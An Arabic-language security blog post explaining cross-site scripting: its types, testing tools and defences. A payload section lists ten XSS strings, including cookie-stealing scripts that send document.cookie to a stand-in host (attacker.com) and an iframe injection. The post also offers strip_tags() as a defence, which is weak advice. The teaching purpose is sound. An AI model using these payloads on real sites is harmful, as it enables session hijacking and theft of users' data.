اهلا ومرحبا بكم في مدونه : Cyber1101 انظم للمجتمع

XSS

 




ثغرة XSS


ثغرة XSS هي اختصار لـ Cross-Site Scripting وهي ثغرة أمنية شائعة في تطبيقات الويب. تسمح هذه الثغرة للمهاجمين بحقن الكود الخبيث في صفحات الويب وتنفيذه عندما يتم استدعاء الصفحة من قبل المستخدمين. ويمكن استخدام ثغرة XSS لسرقة معلومات المستخدمين أو تسليط الضوء على ثغرات أمنية أخرى في التطبيق.

يتم تجنب هذه الثغرات عن طريق التحقق من الإدخالات المستخدمة والتأكد من أنها آمنة وغير قابلة للحقن. ويتم ذلك عن طريق استخدام تقنيات مثل إزالة الحروف الخاصة والتحقق من الإدخالات بواسطة وظائف مثل strip_tags() في PHP. كما يمكن استخدام تقنيات مثل Content Security Policy (CSP) لتقييد مصادر التحميل المسموح بها على الصفحة وتحديد السياسات الآمنة لنوع الكود المسموح به على صفحة الويب.

انواع ثغرة XSS


هناك ثلاثة أنواع رئيسية من ثغرة XSS:

  •  الثغرة المخزنة (Stored XSS): تحدث هذه الثغرة عندما يتم حفظ الكود الخبيث على الخادم ويتم استدعاؤه في كل مرة يتم فيها استدعاء الصفحة الموجود بها الكود الخبيث. ويمكن أن تكون هذه الثغرة خطيرة جدًا حيث يمكن للمهاجمين سرقة معلومات المستخدمين أو تنفيذ أوامر خبيثة باستخدام حساب المستخدم المخترق.

  •  الثغرة المختلطة (Reflected XSS): تحدث هذه الثغرة عندما يتم إدخال الكود الخبيث في متغير في عنوان URL أو نموذج على صفحة الويب، ويتم استجابة الموقع بإرجاع الكود الخبيث في الصفحة المستجابة. ويمكن للمهاجمين استغلال هذه الثغرة للحصول على معلومات المستخدمين أو تنفيذ أوامر خبيثة.

  •  الثغرة DOM-based XSS: تحدث هذه الثغرة عندما يتم إدخال الكود الخبيث في عنوان URL أو عنصر HTML على الصفحة ويتم تنفيذ الكود الخبيث من قبل متصفح الويب لدى العرض في الصفحة. ويمكن للمهاجمين استغلال هذه الثغرة للتلاعب بعناصر الصفحة وتنفيذ أوامر خبيثة عند استدعاء الصفحة.

ادوات تستخدم في xss


هناك العديد من الأدوات التي يمكن استخدامها لاختبار الثغرات المتعلقة بـ XSS. بعض هذه الأدوات هي:

  •  Burp Suite: يسمح Burp Suite لمهندسي الأمان بتفحص وتحليل حركة المرور بين المستعرض والخادم. ويمكن استخدامه لتحليل الاستجابات والطلبات والتأكد من عدم وجود ثغرات XSS.
  • OWASP ZAP: يتيح OWASP ZAP إمكانية الاختبار السريع للثغرات المتعلقة بـ XSS. ويمكن استخدامه لتحليل الطلبات والاستجابات واكتشاف الثغرات المختلفة.
  •  XSStrike: XSStrike هو أداة تستخدم لاختبار الثغرات المتعلقة بـ XSS في تطبيقات الويب. وتعمل على تحليل الصفحات واكتشاف النقاط القابلة للاستغلال.
  • BeEF: BeEF هي أداة للحقن المتقدمة تستخدم للاختبار السريع للثغرات المتعلقة بـ XSS. ويمكن استخدامها لاختبار تطبيقات الويب والحصول على إحصائيات مفصلة عن الثغرات المكتشفة.
  • Wapiti: Wapiti هي أداة لاختبار الاختراق تستخدم للاختبار السريع للثغرات المتعلقة بـ XSS. وتتميز بسهولة الاستخدام والتكامل مع أنظمة إدارة الثغرات المختلفة.

بايلودات ل xss


تُستخدم البايلودات (payloads) في هجمات XSS لإدخال رموز خبيثة (malicious code) في صفحات الويب وتنفيذها عندما يتم عرض الصفحة من قِبل المستخدم. وهناك العديد من البايلودات التي يمكن استخدامها في هجمات XSS، ومنها:


  • <script>alert('XSS');</script>
  • <script>alert('XSS');</script>
  • <script>alert(String.fromCharCode(88,83,83))</script>
  • <img src=x onerror=alert('XSS')>
  • <svg/onload=alert('XSS')>
  • <iframe/src=”javascript:alert('XSS');”>
  • <script>document.location=’http://attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>
  • <script>new Image().src=”http://attacker.com/collect.gif?cookie=’+document.cookie;</script>
  • <script>document.body.innerHTML=’<iframe/src=”http://attacker.com/exploit”></iframe>’;</script>
  • <a href="javascript:alert('XSS')">Click Me</a>

تذكر أن استخدام هذه البايلودات في هجمات XSS قد يؤدي إلى تنفيذ رموز خبيثة وتسبب ضررًا للمستخدمين. لذلك يجب استخدامها بحذر وفقًا للأهداف الأخلاقية والقانونية.

الحمايه من ثغرة xss


هناك عدة خطوات يمكن اتباعها للحماية من ثغرة XSS، ومن أهمها:

  1. فلترة الإدخالات: يجب التحقق من صحة الإدخالات المُدخلة من قِبل المستخدم، وذلك بفلترتها وإزالة أي رموز أو كلمات غير مصرح بها. يمكن استخدام مكتبات فلترة الإدخالات مثل HTML Purifier وESAPI.
  2. الهروب من الحروف المميزة: يجب تحويل الحروف المميزة مثل < و > و " و ' و & إلى رموز HTML المعتمدة مثل &lt; و &gt; و &quot; و &#39; و &amp; عند عرض البيانات المُدخلة أو المُخزّنة في قاعدة البيانات.
  3.  إستخدام HTTP Only كعلامة لكوكيز (علامة الحماية): يمكن استخدام علامة HTTP Only لمنع الاختراق الخبيث من الجافا سكربت ويمكن القيام بهذا بإضافة هذه العلامة إلى كوكيز الجلسة. 
  4. تحديث برامج المتصفح: يجب تحديث برامج المتصفح الخاص بك لأحدث إصدار له، والتأكد من تحديث الإضافات والملحقات الخاصة به.
  5. استخدام HTTPS: يجب استخدام HTTPS لتشفير الاتصال بين المستخدم والخادم، والحماية من هجمات تسلل البيانات.
  6. الاستخدام السليم لجلسة المستخدم: يجب استخدام جلسات المستخدم بشكل صحيح، وضمان تخزين معرّف الجلسة في مكان آمن، وتحديثه بشكل متكرر.
  7.  الاستخدام المناسب للكوكيز: يجب استخدام الكوكيز بشكل صحيح وفقًا للأغراض المختلفة، وتفعيل الحماية اللازمة للكوكيز عندما يتم استخدامها في اتصالات الشبكة.

وتذكر أن الوقاية من هجمات XSS تعتمد على دمج مجموعة من الإجراءات الأمنية في أنظمة الويب المختلفة، وعلى توعية المستخدمين بأساليب الاحتيال والهجمات الإلكترونية.

إرسال تعليق

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.